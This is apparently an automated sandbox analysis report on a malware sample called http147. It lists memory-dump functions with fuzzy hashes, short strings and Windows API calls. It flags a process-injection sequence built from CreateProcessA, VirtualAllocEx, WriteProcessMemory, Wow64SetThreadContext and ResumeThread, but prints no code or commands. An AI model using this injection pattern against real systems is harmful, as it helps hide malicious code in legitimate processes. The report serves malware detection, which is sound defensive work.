_, xrefs: 07237CCA

Memory Dump Source

Source File: 00000006.00000002.4400891558.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7230000_http147.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: e8ad92f3f4311e1b94c45681a6ee19af30af521187c8c94a40d3ed46ecd5131a
Instruction ID: 528125388fe361f3841991eb36494067bc406479223aca3453226051cf7b13bc
Opcode Fuzzy Hash: e8ad92f3f4311e1b94c45681a6ee19af30af521187c8c94a40d3ed46ecd5131a
Instruction Fuzzy Hash: C59182B5E10219EFCB05DFA5C8448AEFBFAFF89300B15856EE504AB220EB359845CF50

Function 07511127 Relevance: .7, Instructions: 739COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4402463645.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7510000_http147.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 539ce77846e64a55d714d3a93cf7280697300480cbd8c3147d486419d52406b1
Instruction ID: a70dd9d1660019eab7c83f761743345f68b8a7567c7462c32ab4c01631c9412c
Opcode Fuzzy Hash: 539ce77846e64a55d714d3a93cf7280697300480cbd8c3147d486419d52406b1
Instruction Fuzzy Hash: E972F574A01699CFE750CF69C880B8ABBB2FF49301F1594A5E508DB362EB34ED81CB55

Function 07511138 Relevance: .7, Instructions: 727COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4402463645.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7510000_http147.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73acfcc6cefe60cc6b0e3b68c07b873ac05fae6c782093c163b3d1759996fde2
Instruction ID: b79a9b4e007c55733c71805b88146b655580ed8a14ba8bbbb2a5e3e80c615800
Opcode Fuzzy Hash: 73acfcc6cefe60cc6b0e3b68c07b873ac05fae6c782093c163b3d1759996fde2
Instruction Fuzzy Hash: 5E72F574A01699CFE750CF69C880B8ABBB2FF49301F1594A5E508DB362EB34ED81CB55

Function 07510878 Relevance: .5, Instructions: 487COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4402463645.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7510000_http147.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cf04d38ea2dbf06e2e9f5084c57c8aa0e9fafdaaad744037b7002fcef4bb82b
Instruction ID: d82bfd04bd6ae219290bc6c6216b0c52a776337c3fe08485a41a8737f6349816
Opcode Fuzzy Hash: 8cf04d38ea2dbf06e2e9f5084c57c8aa0e9fafdaaad744037b7002fcef4bb82b
Instruction Fuzzy Hash: EC32C374A01299CFE750CF69C584A8ABBF2FF49301F1590A9E418DB362EB34E981CF55

Function 07510888 Relevance: .5, Instructions: 478COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4402463645.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7510000_http147.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1df0725beec5c04bd967d4437ec0d3f363930db50f14416b354a5711c054789c
Instruction ID: fce57a990f73df385e0a2bdf015258a07553320e5ad61122959940c351330f39
Opcode Fuzzy Hash: 1df0725beec5c04bd967d4437ec0d3f363930db50f14416b354a5711c054789c
Instruction Fuzzy Hash: 3432C274A01299CFE750CF69C584A8ABBF2FF49301F1590A9E408DB362EB34E981CF55

Function 0723BC28 Relevance: .4, Instructions: 431COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4400891558.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7230000_http147.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dc9b512f503211f6b82612258b1460fcca277c04737ee7ff82289677b3661d3
Instruction ID: 88381b7ddc108278a777e79c75bef44ca4522b992b9cfc69c023109bea04f9d1
Opcode Fuzzy Hash: 1dc9b512f503211f6b82612258b1460fcca277c04737ee7ff82289677b3661d3
Instruction Fuzzy Hash: 2E22D6B1D1071ACACB11EF69C8546D9FBB1FF99300F1486AAD549B7210EB70AAD5CF80

Function 0723BC18 Relevance: .4, Instructions: 367COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4400891558.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7230000_http147.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b786afb4ff43cfef645b576123686d95fbafd769cea3b10292cce51de4bdcc9f
Instruction ID: 2e458c0025f274c55dc241cd19aa871371d674ed0ab9aaff240da49432745c98
Opcode Fuzzy Hash: b786afb4ff43cfef645b576123686d95fbafd769cea3b10292cce51de4bdcc9f
Instruction Fuzzy Hash: 0C02F5B1D1072ACACB11EF69C8506D9FBB1FF99300F14869AD54977210EB70AAD5CF80

Function 07237A59 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4400891558.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7230000_http147.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87078824e291a5688c2b60c177eb46602152d8416ef542a0a47138bfa37044d4
Instruction ID: 9b77c59412714945d0a2e38af5ebedb34ef2fdcaa4ba8cd96428d3d1e2583b51
Opcode Fuzzy Hash: 87078824e291a5688c2b60c177eb46602152d8416ef542a0a47138bfa37044d4
Instruction Fuzzy Hash: A7715EB5E10219EFCB05DFA5C8448AEBBF7FF89300B15856EE005AB224DB35A855CF50

Function 0723EB20 Relevance: 8.1, Strings: 6, Instructions: 561
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(bq, xrefs: 0723EFA8
LR^q, xrefs: 0723EE95
$^q, xrefs: 0723EB8D
$^q, xrefs: 0723EEF4
$^q, xrefs: 0723EEE8
PH^q, xrefs: 0723EF2C

Memory Dump Source

Source File: 00000006.00000002.4400891558.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7230000_http147.jbxd

Similarity

API ID:
String ID: (bq$LR^q$PH^q$$^q$$^q$$^q
API String ID: 0-1731962052
Opcode ID: d73194a89dc49013ec21fef305922ca471d3cfa7cd62922b0ef9cd2e41564de3
Instruction ID: 142b8c10b136f1d6a1ad8f778ea2707d2b8bbea896caf2cd2fa7c089862862e5
Opcode Fuzzy Hash: d73194a89dc49013ec21fef305922ca471d3cfa7cd62922b0ef9cd2e41564de3
Instruction Fuzzy Hash: 52227FB4B00605CFDB04EF69D498A6EB7F2FB88700F14811AE606DB394DB75AC46CB61

Function 0723EAF1 Relevance: 5.2, Strings: 4, Instructions: 204
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LR^q, xrefs: 0723EE95
$^q, xrefs: 0723EB8D
$^q, xrefs: 0723EEE8
PH^q, xrefs: 0723EF2C

Memory Dump Source

Source File: 00000006.00000002.4400891558.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7230000_http147.jbxd

Similarity

API ID:
String ID: LR^q$PH^q$$^q$$^q
API String ID: 0-2238246019
Opcode ID: 870370b1b6cf347d3f077644c66de4e35be42ab72bf50830cd76e569eeb76b2b
Instruction ID: 0c1111ffcc5fe68e523ecb171b043157304e0af98d98f180ebc7f56cdbc302b2
Opcode Fuzzy Hash: 870370b1b6cf347d3f077644c66de4e35be42ab72bf50830cd76e569eeb76b2b
Instruction Fuzzy Hash: 5F71ADF0E2020ACFDB14DF69C5946ADBBF2AF88700F15816AD416DB394DB70E849CB11

Function 0723EAA4 Relevance: 5.2, Strings: 4, Instructions: 200
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LR^q, xrefs: 0723EE95
$^q, xrefs: 0723EB8D
$^q, xrefs: 0723EEE8
PH^q, xrefs: 0723EF2C

Memory Dump Source

Source File: 00000006.00000002.4400891558.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7230000_http147.jbxd

Similarity

API ID:
String ID: LR^q$PH^q$$^q$$^q
API String ID: 0-2238246019
Opcode ID: 26063dbdd2edd5130bd3f37a769dcea54aaa3130491049537c62d184175d162c
Instruction ID: 3db6e19d2b66cc7b3fafc34a235d4ab27922effe0a1c3f81cdb9b178f5c40bba
Opcode Fuzzy Hash: 26063dbdd2edd5130bd3f37a769dcea54aaa3130491049537c62d184175d162c
Instruction Fuzzy Hash: 32716CF0E2060ACFDB24DFA9C5846ADB7F2BF88710F158529D416AB394DB70E8498B51

Function 07236DC8 Relevance: 4.1, Strings: 3, Instructions: 365
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 07237413
Hbq, xrefs: 072373CE
(bq, xrefs: 072376E4

Memory Dump Source

Source File: 00000006.00000002.4400891558.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7230000_http147.jbxd

Similarity

API ID:
String ID: (bq$Hbq$Hbq
API String ID: 0-2817990774
Opcode ID: 1bb9bf16c8d9d52ec26fc8a35623660a2755c7b0b1b4b3196d54627230a6e18d
Instruction ID: 4eee1781b59ad8a240f7cac3cccab18622ab5df4f0de2b6fe431885f07e8abb0
Opcode Fuzzy Hash: 1bb9bf16c8d9d52ec26fc8a35623660a2755c7b0b1b4b3196d54627230a6e18d
Instruction Fuzzy Hash: 38C1C1B1F1021A9FCB15DB78C8946AEBBF6EF88310F158569E405E7391DB349C05CBA1

Function 072371A0 Relevance: 2.8, Strings: 2, Instructions: 288
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 07237413
Hbq, xrefs: 072373CE

Memory Dump Source

Source File: 00000006.00000002.4400891558.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7230000_http147.jbxd

Similarity

API ID:
String ID: Hbq$Hbq
API String ID: 0-4258043069
Opcode ID: cd9e65a8da7447f32b0abf9d00f331778b9ff522190b70ca49be6db7c6942c1d
Instruction ID: f6038c81f7dab0c7b200e3c025ce08f7a46a390fb12f2c2ea7b4ed3091cb3375
Opcode Fuzzy Hash: cd9e65a8da7447f32b0abf9d00f331778b9ff522190b70ca49be6db7c6942c1d
Instruction Fuzzy Hash: 63A1AEF1B102068FDF15DF68C484AAEBBB6EF89310F198569E805AB354DB35DC41CBA1

Function 0772C89C Relevance: 1.7, APIs: 1, Instructions: 249
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0772CADE

Memory Dump Source

Source File: 00000006.00000002.4410457288.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7720000_http147.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 19269f3217b282b640c378a3625d7e8be31cf8d6cdaa979eba26bb52cc5fc664
Instruction ID: d1048158248fc15cc4cd0d948d7d771c2502111d6d875a04cf567f47b9f0a706
Opcode Fuzzy Hash: 19269f3217b282b640c378a3625d7e8be31cf8d6cdaa979eba26bb52cc5fc664
Instruction Fuzzy Hash: 5CA1A0B1D00229DFDB11CF68C8417EDBBB2FF49310F1485A9E858A7240DB749986DFA1

Function 0772C8A8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0772CADE

Memory Dump Source

Source File: 00000006.00000002.4410457288.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7720000_http147.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 55bdc7681e1a71297960832df8a5d266277a0837236f861ad0bca0462424040c
Instruction ID: 5aeaeb1a972516aa9dcd1b8c73e3fdf60bb305e84aa6cc12313453ef01dd7960
Opcode Fuzzy Hash: 55bdc7681e1a71297960832df8a5d266277a0837236f861ad0bca0462424040c
Instruction Fuzzy Hash: 28919FB1D0022ADFDB11CF68C8417EDBBB2BF49310F1485A9E858A7240DB749986DFA1

Function 0272B590 Relevance: 1.7, APIs: 1, Instructions: 200
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.4221428490.0000000002720000.00000040.00000800.00020000.00000000.sdmp, Offset: 02720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2720000_http147.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 5d9eb19b0b2ba92d69be6232a092059027a472b71679e2c47a14ea59e24c18c3
Instruction ID: 0b0f1d5957cfcd94f110fab7685ac8c3b8d7bb20bbaa7c4711ed0814acf41db1
Opcode Fuzzy Hash: 5d9eb19b0b2ba92d69be6232a092059027a472b71679e2c47a14ea59e24c18c3
Instruction Fuzzy Hash: 4B712570A00B158FD724DF2AD04479ABBF6FF88708F10892ED48AD7A50D775E949CB91

Function 0272453C Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 02725DA9

Memory Dump Source

Source File: 00000006.00000002.4221428490.0000000002720000.00000040.00000800.00020000.00000000.sdmp, Offset: 02720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2720000_http147.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 15f66c74a7dfd4337f66b9ca6325215511e5eaab363f02b65a6c5321f6f28756
Instruction ID: f3ee3e382a09ab4f381e2a4275747a7800e57325737a5f39a4768f1b3ffd9149
Opcode Fuzzy Hash: 15f66c74a7dfd4337f66b9ca6325215511e5eaab363f02b65a6c5321f6f28756
Instruction Fuzzy Hash: 6C41C3B0C00719CFDB28DFA9C984BDEBBB5BF48304F64806AD408AB255DB756949CF91

Function 02725CF7 Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 02725DA9

Memory Dump Source

Source File: 00000006.00000002.4221428490.0000000002720000.00000040.00000800.00020000.00000000.sdmp, Offset: 02720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2720000_http147.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 0c220b9cd987740e39dc08088cc1c995bc80bd59876455f49a196f32f0c0afba
Instruction ID: 52067c66f8692453091247556e38e8676d76b288c730c86102c02809794efb20
Opcode Fuzzy Hash: 0c220b9cd987740e39dc08088cc1c995bc80bd59876455f49a196f32f0c0afba
Instruction Fuzzy Hash: B441B4B0C00619CFDB28DFA9C9847DDBBB5BF49304F24806AD408AB255DB756949CF91

Function 0772C618 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0772C6B0

Memory Dump Source

Source File: 00000006.00000002.4410457288.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7720000_http147.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 25a2f57883169fae3e68647dec874f578c22e04b5f0ffe93edfe29c519d856ef
Instruction ID: dab4f5f19ad1c343804b8b663d2ed682875e5793bd445af330a27fd69c037f6e
Opcode Fuzzy Hash: 25a2f57883169fae3e68647dec874f578c22e04b5f0ffe93edfe29c519d856ef
Instruction Fuzzy Hash: 912177B19003599FCB10CFA9C885BDEBBF4FF48310F10882AE958A7250D7789944CBA4

Function 0772C620 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0772C6B0

Memory Dump Source

Source File: 00000006.00000002.4410457288.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7720000_http147.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: b42341b2fcca622936b972b3bcb1796a4db11ea43da01977a9df61208ed17000
Instruction ID: 4ca9be46a3350bc10b11f3df20d70f7f69dc70c6cfed545f418de0eb5fba7302
Opcode Fuzzy Hash: b42341b2fcca622936b972b3bcb1796a4db11ea43da01977a9df61208ed17000
Instruction Fuzzy Hash: D02166B19003599FCB10CFAAC885BDEBBF4FF48314F10882AE958A7250C7789944DBA4

Function 0772C709 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0772C790

Memory Dump Source

Source File: 00000006.00000002.4410457288.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7720000_http147.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: eeae440beb00b8f6d323b704079598863f05832b1a7662bd1e4d5dfc8ecc46e4
Instruction ID: 908aa661f4e34bca4b9ab1456501d1fde5afbbe393aef8418658ddefa1fc7eb9
Opcode Fuzzy Hash: eeae440beb00b8f6d323b704079598863f05832b1a7662bd1e4d5dfc8ecc46e4
Instruction Fuzzy Hash: 1A214AB18002599FCB10DFAAC885AEEFBF5FF48310F108429E558A7250D7789540CBA5

Function 0772C481 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0772C506

Memory Dump Source

Source File: 00000006.00000002.4410457288.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7720000_http147.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 0475a10a258b6a86e096620cba7c6a05a030b0230fe3bd1798fe11c49bb75589
Instruction ID: 8c2aafa3ee36dd78a9c895f3e21eba3524e20c3d950b5e8882b761da7e11b4ab
Opcode Fuzzy Hash: 0475a10a258b6a86e096620cba7c6a05a030b0230fe3bd1798fe11c49bb75589
Instruction Fuzzy Hash: 2E219AB19002098FDB10DFAAC444BEEBFF4EF88350F108429D458A7241DB789945CFA0

Function 0272D120 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0272DA26,?,?,?,?,?), ref: 0272DAE7

Memory Dump Source

Source File: 00000006.00000002.4221428490.0000000002720000.00000040.00000800.00020000.00000000.sdmp, Offset: 02720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2720000_http147.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 0e7624b18cea0af3cf1416ca7a3abd63911ae36435bd6ad494fef04bf2238406
Instruction ID: 57daf63c7e4f75f7debedcc62e479d46e658bd4e5b0a07a9568d6c1fd20b7249
Opcode Fuzzy Hash: 0e7624b18cea0af3cf1416ca7a3abd63911ae36435bd6ad494fef04bf2238406
Instruction Fuzzy Hash: 332103B5900258DFDB10CF9AD584ADEBBF4FB48310F10802AE954A3310D374A944CFA4

Function 0772C710 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0772C790

Memory Dump Source

Source File: 00000006.00000002.4410457288.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7720000_http147.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: ab7e92931418db6ea4994fa58f4e50b2269bcfac7fd5163a4c76b48a02efe4d6
Instruction ID: c3cd3002ec904927893c2860516e41eda58aa795f392f5e6bcb7c79bc53ab75f
Opcode Fuzzy Hash: ab7e92931418db6ea4994fa58f4e50b2269bcfac7fd5163a4c76b48a02efe4d6
Instruction Fuzzy Hash: BE2128B18002599FCB10DFAAC884ADEFBF5FF48320F108429E558A7250D7349545DBA4

Function 0772C488 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0772C506

Memory Dump Source

Source File: 00000006.00000002.4410457288.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7720000_http147.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 14eb63bf562d9879e4a267af8e07a0584f062e6e0fb7f4c899625d9386399f69
Instruction ID: a2033d62657a786e843dbcb6db318fa2473b861023416e031dffdb4e5fbb7957
Opcode Fuzzy Hash: 14eb63bf562d9879e4a267af8e07a0584f062e6e0fb7f4c899625d9386399f69
Instruction Fuzzy Hash: 602138B19002198FDB10DFAAC485BEEBBF4EF48364F108429D459A7241DB78A945CFA4

Function 0772C559 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0772C5CE

Memory Dump Source

Source File: 00000006.00000002.4410457288.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7720000_http147.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b31a4c7820b032ae34db097405c8a0784ac86bb9f2659190932f36e5067c2e68
Instruction ID: 7c6f2b53cf9f9bfcc50b60dcb8a38b45a8a136ec33dd2d16075096d50b8d8c8e
Opcode Fuzzy Hash: b31a4c7820b032ae34db097405c8a0784ac86bb9f2659190932f36e5067c2e68
Instruction Fuzzy Hash: 561159B19002499FCB10DFAAC844AEEBFF5EF88320F208419E559A7250CB759554CFA1

Function 0772C560 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0772C5CE

Memory Dump Source

Source File: 00000006.00000002.4410457288.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7720000_http147.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 801419bce40447be1d998f2d802b83f0367a11127dd29a3b48ad82d62eeef240
Instruction ID: 6d3d3f1e3fd639d3dc013ac1bb52362ebcc91b9812b25c9a855ffc1f6dde1f3d
Opcode Fuzzy Hash: 801419bce40447be1d998f2d802b83f0367a11127dd29a3b48ad82d62eeef240
Instruction Fuzzy Hash: DA1137B19002599FCB10DFAAC844BEEFFF5EF88324F208819E559A7250CB75A544CFA4

Function 02729F98 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,0272B5AC), ref: 0272B7E6

Memory Dump Source

Source File: 00000006.00000002.4221428490.0000000002720000.00000040.00000800.00020000.00000000.sdmp, Offset: 02720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2720000_http147.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 781e89bb72f4240fef87a06e4e11d2d0a75b9931643582ab5486d67c8cf56284
Instruction ID: d8c4aad10ad56ee8ea72b75cb83d009b36ec94c212e530881873ac6743edce9c
Opcode Fuzzy Hash: 781e89bb72f4240fef87a06e4e11d2d0a75b9931643582ab5486d67c8cf56284
Instruction Fuzzy Hash: FC1120B58002598FDB10CF9AC444BDEFBF4AB48228F10842AD458B7300D374A545CFA4

Function 0772C3D0 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 0772C43A

Memory Dump Source

Source File: 00000006.00000002.4410457288.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7720000_http147.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: e16064ac171683294ba271536c60de867619c9ea4af62abd23ae4d826af4c5f5
Instruction ID: b07a100c075ff1f36b85adfb46b10a11c3bdde59f02a2e372194f1d64f8ec91f
Opcode Fuzzy Hash: e16064ac171683294ba271536c60de867619c9ea4af62abd23ae4d826af4c5f5
Instruction Fuzzy Hash: 38116DB1D002598FDB10DFAAC4447EEFFF5AF88324F208529C469A7250C735A545CFA4

Function 0772C3D8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 0772C43A

Memory Dump Source

Source File: 00000006.00000002.4410457288.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7720000_http147.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 1410ad5db5c7879a7666da3dc963d833383f6adaceb3efdc0bbc8fc10a6286ca
Instruction ID: 3a8ae63b4e8bb638ea3095c035ea7233591dc21fa769858dd4514468435d07fe
Opcode Fuzzy Hash: 1410ad5db5c7879a7666da3dc963d833383f6adaceb3efdc0bbc8fc10a6286ca
Instruction Fuzzy Hash: 6B1155B19002588FCB20DFAAC4447EEFBF5AB88324F208829C559A7240CB34A945CBA4

Function 07232230 Relevance: 1.4, Strings: 1, Instructions: 118COMMON

Download Yara Rule

Strings

(bq, xrefs: 07232324

Memory Dump Source

Source File: 00000006.00000002.4400891558.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7230000_http147.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: 2d7c1c4c44b120a069c9671144e721e3f4c1c8b2a4587be431b13633eb5fb3f3
Instruction ID: d2278f561e3762355338d5faa741597202008dc8f2b2061c08bfea2d13bf9451
Opcode Fuzzy Hash: 2d7c1c4c44b120a069c9671144e721e3f4c1c8b2a4587be431b13633eb5fb3f3
Instruction Fuzzy Hash: CD41ACB1A10615CFCB04EB6CC804AAEBBF6EF89200F14816AD409DB361DB74AD85CB91

Function 07235DD8 Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

PH^q, xrefs: 07235EE5

Memory Dump Source

Source File: 00000006.00000002.4400891558.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7230000_http147.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: b3841ef67ddbdc749e2029f3ed905ddc362ac872cfd9638c660ba554d9589596
Instruction ID: 0d422fbe1d8a34a2f2464e76e680d5a03845f22de9233cc3370dbd46eb261dfd
Opcode Fuzzy Hash: b3841ef67ddbdc749e2029f3ed905ddc362ac872cfd9638c660ba554d9589596
Instruction Fuzzy Hash: 48418BB0620255CFCB14DB75C948AADB7F2FF89700F1585A9E00AAB364DB35DD44CB90

Function 07235DE8 Relevance: 1.3, Strings: 1, Instructions: 88COMMON

Download Yara Rule

Strings

PH^q, xrefs: 07235EE5

Memory Dump Source

Source File: 00000006.00000002.4400891558.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7230000_http147.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: c346f59a8cab82b2616b938b8ede6a508b317f5f938167cec2a1c498ae3746f3
Instruction ID: a184f95ae6e78980f37c6f1d5c82e60e817c73d7b2a1402b694140dee3eb3506
Opcode Fuzzy Hash: c346f59a8cab82b2616b938b8ede6a508b317f5f938167cec2a1c498ae3746f3
Instruction Fuzzy Hash: C33118B0A20249CFCB14DB79C948AEDB7F1FF88600F1445A9D40AAB360DF369D54CB61

Function 0723DA48 Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

Te^q, xrefs: 0723DAB3

Memory Dump Source

Source File: 00000006.00000002.4400891558.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

